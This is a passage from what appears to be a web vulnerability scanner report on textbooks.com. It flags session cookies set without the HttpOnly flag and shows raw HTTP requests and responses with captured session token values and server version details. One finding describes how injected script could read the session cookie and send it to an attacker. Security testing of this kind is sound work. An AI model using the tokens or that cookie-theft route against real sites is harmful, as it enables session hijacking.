TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:52:56 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: TBSESSION=diw23%2FKe3OZGzz7eXeDf5b7KG%2FcZmVR6hXoB8ZAZa7nnEqe5l45%2Bqp5xSSlixethcaKgByLIR2W0HXRNyDrZmJa3qk2F7zxApcKGthtBvd784CeWA4Bz0qGxT3yzHSCpUBtLGIz9Fc%2FG7QfiJnfTRM8OgB8P45M%2BHAmeRL1hxvaXZl4%2BhIKyUPEzLIDFnExvi1kk5fSLqZ9D14N2OSxYx4EyqjiJlEFj97Bpitlix3zA79OnNtNMqrV%2FXE7hWVP4aCOrCzZN5%2FoA%2BXebh%2Bcpj%2B8ldGrRG1noPkNbfwZXDOtl1YYcyUNamKCdxTJOua6CbVHeAiKBYLz%2BwgXw0Xla6UhKpp3HGuDQqj6LtCcAvjh7znRvVS%2FCDUYKRCViqno%2BPMQG1yWYDsSrvqY%2BtpCRE4%2Bv3QNdKU%2FbYJ8yz%2BXumN9wSBqQIr623SjzpRWrIc1aVNk0MLTHAarTQO2XdxSJ8Ns31xQic7T%2BZZkNFpLb%2Fz%2FNCJu8ZhqpdOYClKWyZ%2B6m0sKgj8UNbBI6CewScnr3I%2FiZhaF8iNmwalJQQ4QC4hGQA0wTxW5LdJTzZDZMJS0I0TUU12QyTk7iYBtK95GjkCNeLFM1%2BDPS6vrL0YLQQSYkfZETlYLev03pCSTKLSWSKNRcLSu4nYkAA5gxVMAVNYpux2tIegYT1ad8COQhZ2tW3M76Twdb2xYEh3bK020hXCcOKChAVqGUxnvOLO8%2F4YxnqnxNch5SoDLL9Mf0xTV%2B%2B0Fp6RlkuNKDywxfTxHFL6GSoYDrFmtEGz6LzPddsCFgEQzN0bifaAavc3DQdmCWTWaGdwkSsQONOpOBNLRD3XduHem%2FTnbkl7YoB7elZKarX2JdzFAfglwd2F9F7nIgcpsJuGva%2B7j6zNW4kvsuZ4evbv6DHJZCeqUacnU79XoloCbS%2FdNzRg5XgATUzjwQA4LDDGbmQRLLEK0Bvr3sT3S2Ry6Ltx5L4eDsFbqABjN%2FjvJCICcP0YWNOSl3Fuu0SA6O0QIp7jcYr7wGaLNHoKrWHRun34v7UiTQ9BZyTxXFTLc1NZfccF%2BmfaLMrQAROi0AWzO3SuzESJaZTmIbQcanPUdrwzIMiTL0WGCb6MJAgbtMYk333%2Fu%2F6btRLLvMCwAknVNCGjUHxZeNxRmnXZVbei6DaaKvKsLGn86GU%2Bc5RGQcalORxKRRAPkRN%2F478lT9Z2EknlPyqpXa41GUv7pzfAx6y9gRqE89gdkFBhNkJP9JQqc68ostt6UMxlruOMlyL%2BZcNo6wpW4%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=gDudYol3rrcVRWT6jO4%3D; expires=Mon, 26-Dec-2011 13:52:56 GMT; path=/; domain=.textbooks.com
Content-Length: 116160


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

4.22. http://www.textbooks.com/ISBN/9780805853223/Peter-Vorderer/Playing-Video-Games_-_0805853227.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /ISBN/9780805853223/Peter-Vorderer/Playing-Video-Games_-_0805853227.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: TBSESSION and TBPERSIST (see the two Set-Cookie headers in the response below). TBSESSION, by its name, appears to contain a session token, which increases the risk associated with this issue: without HttpOnly, any script running in a page on this domain, including script injected through a cross-site scripting flaw, can read the cookie through document.cookie and send it to an attacker. Review the contents of the cookies to determine their function.

Request

GET /ISBN/9780805853223/Peter-Vorderer/Playing-Video-Games_-_0805853227.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:53:05 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: TBSESSION=NSuBfBZxQLlmKeVpj2p9K6GXP2Xq3GqdlF1j29JhhP49qoDnj2VhPtF%2BzSMKT9eCs63vmDbUC14gRGlgOHW7iFnIz0nKPe4%2F28zhfUjEeIK6BU0mxbEy6a8NP6ZcHZDS0d%2BGLBJoPYFfBELmQxETjIyvr2JM1BckKpl0%2B%2BGweX4L3LRDN5hyWbPjFFZsQpfxoALTnPu69wrYw9YLAXXnWMwe5PvA0km5HWA%2BQM88x8U%2FaM68vO5NjBdmH3FR0tXFt%2F6F28h524nLS4lf8W3thACm9zITvDf9NoE17qU5XvOcrc08uQ2cku7dv5vkw0PHJpGld9fII2rcIRrLbO9cOObvvaao7XCozluY12rqImY2KgnOG36TKR8T918yXmNWsyM3AlfUA52%2FBahT0cp2ZTZqBJ0gudZ6OAXk6cPNIt%2BakJpEpqp7rJb06ioOGUX%2F1Vi5pB9JNB6fyvmXx4d6gSsxttlSjtElFEUfjQtr053LITRw%2Fb8vRkQ0VhDtfiGE9Jcij5xSVEEO0ox9LYAb%2F2xs5ZXXXRDG7ih2dMYCY59Q8bg3yKOWfSV6J0vEevFy%2BTGbXwnm8kVPW6L%2BuUyAcSDBWicdfRqSPGZ%2FDpayY%2BG2mJaKC5pg6uBJ3ZyqnE%2F4SB9F0KOBuSYIBozjljgRga2cOEwLRVzeiEn1gaaZHSm75%2Bkejm8YlEWk1rsoaCWeQzSyWkgT6CbSxr9GvZ7Kv7kAFjwY8qskCs6Ory5E4qfg45Uwz3%2BYuzWGBhD9Ux5cir%2BY5XNzM%2FeXU4T0SPQl5V7i6pIVw6m8y7uglKdwbCqgGE%2ByDp0mERMZCSrcclffc3ivX7zLrQhW9UPAvTQpdDdX4%2BQ6HF%2Ft9qMV1LK%2BWKfooVLyowzRgeBdLcKqC6ZKqQbX%2Bx2W5dlseuvChLi5UwH51Tl1%2B5QeNrbdUs%2Fb2%2FzzUAVe12METH%2Bb9HtMkeFT1j6YkC6YeYNtovu6DuRv2OxcGW1RLzACktX%2Fp98Xk4%2B5qYvnNceL8VBb0sUyDTMbclqZrXvHjROfKugoAIttOGs1mzIDvbdpm5bXNAAfXzZU2bJqbIAmibKVtX3NFe5E0f32%2B85IUuosNZ%2Bv6vO%2Br1HgpsZg%2FnRyj3L6LQ7MJb316arXbMKidws9b4f%2BDLk%2FhD5rdtYjKA8WvrDfpRnOJYFB2oPEBYC3Gz0EADTnhRY%2BD2TTQnYCXd7dPyZaiFtT5cBJs6NP5syouTWXfoYCkgP%2Fl5M2pKt00u0Wx%2B9sMSOI3gSj%2BMLyTaNj8bA%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=cqnUxW8NCiD%2BXzL8wDU%3D; expires=Mon, 26-Dec-2011 13:53:05 GMT; path=/; domain=.textbooks.com
Content-Length: 55229


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head>
   <meta name="keyw
...[SNIP]...

4.23. http://www.textbooks.com/buy-textbooks.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /buy-textbooks.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /buy-textbooks.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:51:57 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: TBSESSION=%2BXtVJGYHo3mlKCIO6uOjhqxhveDjwNpBbuHWVtbh8Gm7JgD2rX11pMKyI9%2BQFysTcmyvJS9XeGRcLRFjQeRkSDnACvzpdJiA7jxBwTixZ5rnl36UXVni%2FxgMaTE3rDzwSX8mQzQUCJxIUhieDsn3QnrqBsMcoZSZCF%2BCOJXpWeh5le7dM%2BNL5g5z%2F%2Fps5zbn8%2FnJOeEH0pZT2obBQ2kK3ETq0S2D3%2B6Rl760NIZrMwumRmQL7RSjBErU%2FHKyMLNo6FYb0Glu6LcoFpsHG4xzpBYPbAK4DN1mOGSkKEUFyxz8d8c45vlwUFbo69jfmLt%2BVzlSxrXC877DtUBSuUgrMRpI3XrqT657VIIBBsUW2zhYaC9j728B7jm2paAXwp%2BPRecf0EFU4xDpmyKWYL3W%2BU7ijPKdQI%2F0MlC2iV0rYs87eFEAMV9QSPCf9Ogy6jpnN5gtffB5EU2mXjQRVupmFKgMidJu680VRfflPt06AGmwQtuM6VtAvIe6vugo1nbIjnnfTxOfatndyOr%2Fs%2BW7I%2FzHheTTfNagKyEtHChaKKm5mk7GyBLxTbaFPYYNEO75XTdqUkpqkpvF6xunkyYn29rRa1gk3f6bFMK2w%2FIeatojhK0etUPlwEkCTqf2kHD1IUBKM7WTmICPwBFWy3ZDjUlPKShDG6gXnNuC7L24VcRZufhOkz5t%2BELd51guT5NLTgDXLuB3Yfz0InuF4wt6f7Fuj1bln6YNCKckbZnubS2oSQ74iPHbib%2FNsW7NPE4Kns1jA1wUTRE5VsECqhFYhSBLoSrf%2ByEa3Lp2%2FBf487Z1K1237xfKrjZjIQ41kYC8qoW1eOwPiEH0lmiu4W6u44KOOKCGKd7T5ZLOVflFVF7cufY35%2B058j0p9%2BH3HW1B9hHCUdCiA2AJOwO%2FaPlIJGrvesRxbQtvuaO94Z9ZJwwH8CiN9EoTbEBAlyc%2BUoYPJ0hsQYx6Gv4m30fqhctWj5nWs4HODbYXQ0ftY32RZiD%2FeTtAS87mZmPHHJy9ny%2FCK06TR7dJyOeowsJmWqd3ZKgKsnHkWnrDwfQoW8gqtPnR5c79c0XUymbZoxIrRCEDZxlYDs98Rxbszwl0prmCZHtdjZHz799IS7k7t73CdyrjrltfqyTLaA6U3h6lv1KC4DqRCGfOc8HMzm4wqx0%2Fx3%2F2nRPgPadviz6Qp4DH4CeXmmOh7OQyHlIDjM%2B64C%2FM1j0D5MQnE6M12sBIw%2BbS0N46znX2isHbdWqnuL8dgYNCJZnAJd7QdMNYe%2BQ%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=AmOCzIVFPte8ojCPQx4%3D; expires=Mon, 26-Dec-2011 13:51:57 GMT; path=/; domain=.textbooks.com
Content-Length: 61327


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

4.24. http://www.textbooks.com/etextbooks.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /etextbooks.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /etextbooks.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:53:07 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: TBSESSION=Pbk2zJyA8AE3TFrTqb2spaGwWBp5fz8HvEQD88AlWpwL760JR1jSFrZnXeH4WrLwIDiWmNrqfND9qJspcMZT4Kpj1Y7fHKHkf%2BHnIAjFDoFOZkuevMg9KXcgpFZaPB79Bv%2FMmDw31nJJ4wpzfW9y3t1XykAB9NVBARjIbg%2F2%2BdCQO%2FtL60u7%2FW51ZKwfLpMJVuxvqZi8UPWkkWdQh0E7ljYzAa1pW7%2Bu6B4eIdO1Ys33T2YRyapxvsDcanPAsMXkVDJFj2R9XQ5%2FZZ8UOzBkS8nWw9UEqcUjEDC2PuFlRoEjA09UcABoUb0eHErfvmOsosLDdq7Ro5YLXw955cnUadphO8mzRY2exRZe%2BZkOXQobYPzMc6HYKioy2wI9RyIyS6%2BNuBMOxIxwoC8rqStJJ8pTYfZQfuAa1JQQQruc9fG%2B2dFIU%2B2SLrXwsw1KfAP4r15ynWkXmh%2BMmhZ9sApr08IeV7AeG0ZFhR6PSNqLzUrwJHJlexJUiXFmKs38Z1Kg9h8eEHrZ1Wm8to8wqN1%2Fcc7x8x8n3ANy%2B7MOLbGElcCRhzQCw8Bg%2FwhodX8iZPPopZ5eeDz%2BZ3MKpwDSLOfx%2FKNcykivltXCVYSnk3lpgn7zbUI9p3QCLM8NkfNDpxaF%2B8ghgPaUyFsFnsd3Z0Vjg1NHay2se3%2BGgB9DdCLq3xL4%2F0zf2ceHWHflLhndU9G%2FA14jzNozTWVtwocyZKBmmkNT0ZLhv9R9EltOqH4wTJZBCMjMXlOt%2BDAMkfM%2BvQvUzF12sR7HRc6157s07zyouCOzVSnXCGTeKQH6TcJ6DGrODApiAyvA5Hk6he6y1qV2KqjPWwYufG80oa%2BbJ9avXFRU0xgpuYnX3L%2BzjmU6oiUEwZA745IyWLTIGGUht%2Fub0Sg48hoCRt5395zXpp7dKZAjvruKpXnJ7ErwccTX8YtADj9ZixHHwnQF0kL8v6E8RwYJhyGAd%2BxbhBJC3XH7gsc11jRw8iYqYDVA8xKHQxVYGaL6Vr43iJ6cHPkMxsDtzbmR%2BarJs1OanYNc2PVYoAZvrdfAQBm3VppTVNcpBJ4ATbUNHZUwwAwz2oyLd7yHQYOwCSVjbz4eDM43SyEjUgmRXtpf1ol0PBXvCNA3%2F9g89AxIk2pADswI8SHbm3IqiYblTfJy0luOrTbdNfqsdw5b7NJab8DP%2BC0uILbc6VRmnmcL6iT42bd3Hi7llP1l1Lal7AvNMdnVbebi4c%2FZ2HlALQTyIaZt7N%2BGH%2BZIFve1iZOablhb3oDCnxY%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=j%2B55cxm1jR4qZ2uZPCY%3D; expires=Mon, 26-Dec-2011 13:53:06 GMT; path=/; domain=.textbooks.com
Content-Length: 49082


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

4.25. http://www.textbooks.com/rent-textbooks.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /rent-textbooks.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /rent-textbooks.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEs